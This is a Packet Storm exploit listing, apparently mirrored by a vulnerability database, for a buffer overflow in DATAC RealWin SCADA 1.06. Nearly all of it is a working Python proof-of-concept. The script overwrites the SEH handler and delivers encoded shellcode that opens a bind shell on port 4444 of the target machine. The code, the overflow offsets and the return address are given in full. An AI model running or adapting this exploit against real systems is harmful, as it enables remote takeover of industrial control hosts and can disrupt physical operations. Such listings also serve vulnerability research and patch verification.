DATAC RealWin SCADA 1.06 Buffer Overflow

🗓️ 28 Oct 2010 00:00:00Reported by BlakeType
packetstorm🔗 packetstormsecurity.com👁 20 Views
RealWin SCADA System SEH Overwrite Buffer Overflow Exploi
`# Exploit Title: RealWin SCADA System SEH Overwrite  
# Date: 10-27-10  
# Author: Blake  
# Software Link: http://www.realflex.com/products/realwin/realwin.php  
# Version: 1.06  
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)  
  
import socket, sys  
  
if len(sys.argv)!= 3:  
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]  
sys.exit(0)  
  
host = sys.argv[1]  
port = int(sys.argv[2]) # port 912 by default  
  
# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai  
# LPORT=4444,  
shellcode =(  
"\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"  
"\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"  
"\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"  
"\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\x1a"  
"\x96\x0e\x70\x61\xca\xf0\x49\xaa\x1f\xf0\x8e\xd7\xef\xa0\x47"  
"\x93\x5d\x55\xe3\xe1\x5d\x54\x23\x6e\xdd\x2e\x46\xb1\xa9\x84"  
"\x49\xe2\x01\x92\x02\x1a\x2a\xfc\xb2\x1b\xff\x1e\x8e\x52\x74"  
"\xd4\x64\x65\x5c\x24\x84\x57\xa0\xeb\xbb\x57\x2d\xf5\xfc\x50"  
"\xcd\x80\xf6\xa2\x70\x93\xcc\xd9\xae\x16\xd1\x7a\x25\x80\x31"  
"\x7a\xea\x57\xb1\x70\x47\x13\x9d\x94\x56\xf0\x95\xa1\xd3\xf7"  
"\x79\x20\xa7\xd3\x5d\x68\x7c\x7d\xc7\xd4\xd3\x82\x17\xb0\x8c"  
"\x26\x53\x53\xd9\x51\x3e\x3c\x2e\x6c\xc1\xbc\x38\xe7\xb2\x8e"  
"\xe7\x53\x5d\xa3\x60\x7a\x9a\xc4\x5b\x3a\x34\x3b\x63\x3b\x1c"  
"\xf8\x37\x6b\x36\x29\x37\xe0\xc6\xd6\xe2\xa7\x96\x78\x5c\x08"  
"\x47\x39\x0c\xe0\x8d\xb6\x73\x10\xae\x1c\x02\x16\x60\x44\x47"  
"\xf1\x81\x7a\x76\x5d\x0f\x9c\x12\x4d\x59\x36\x8a\xaf\xbe\x8f"  
"\x2d\xcf\x94\xa3\xe6\x47\xa0\xad\x30\x67\x31\xf8\x13\xc4\x99"  
"\x6b\xe7\x06\x1e\x8d\xf8\x02\x36\xc4\xc1\xc5\xcc\xb8\x80\x74"  
"\xd0\x90\x72\x14\x43\x7f\x82\x53\x78\x28\xd5\x34\x4e\x21\xb3"  
"\xa8\xe9\x9b\xa1\x30\x6f\xe3\x61\xef\x4c\xea\x68\x62\xe8\xc8"  
"\x7a\xba\xf1\x54\x2e\x12\xa4\x02\x98\xd4\x1e\xe5\x72\x8f\xcd"  
"\xaf\x12\x56\x3e\x70\x64\x57\x6b\x06\x88\xe6\xc2\x5f\xb7\xc7"  
"\x82\x57\xc0\x35\x33\x97\x1b\xfe\x43\xd2\x01\x57\xcc\xbb\xd0"  
"\xe5\x91\x3b\x0f\x29\xac\xbf\xa5\xd2\x4b\xdf\xcc\xd7\x10\x67"  
"\x3d\xaa\x09\x02\x41\x19\x29\x07")  
  
  
head = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"  
junk = "\x41" * 228  
next_seh = "\xeb\x06\x90\x90" # overwrites next seh  
seh = "\xea\xe3\x02\x40" # seh overwritten at 232 bytes - 4002e3ea  
nops = "\x90" * 20 # nop sled  
junk2 = "\x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode  
  
print "\n===================================="  
print "DATAC RealWin 1.06 Buffer Overflow"  
print "Written by Blake"  
print "Discovered by Luigi Auriemma"  
print "Tested on Windows XP SP3"  
print "====================================\n"  
  
print "[*] Connecting to %s on port %d" % (host,port)  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
s.connect((host,port))  
except:  
print "[x] Error establishing connection\n"  
sys.exit(0)  
  
print "[*] Sending payload"  
s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "\r\n")  
s.close()  
print "[*] Payload sent"  
raw_input("[*] Press any key to exit...\n")  
  
`
28 Oct 2010 00:00Current
1.4Low risk
Vulners AI Score1.4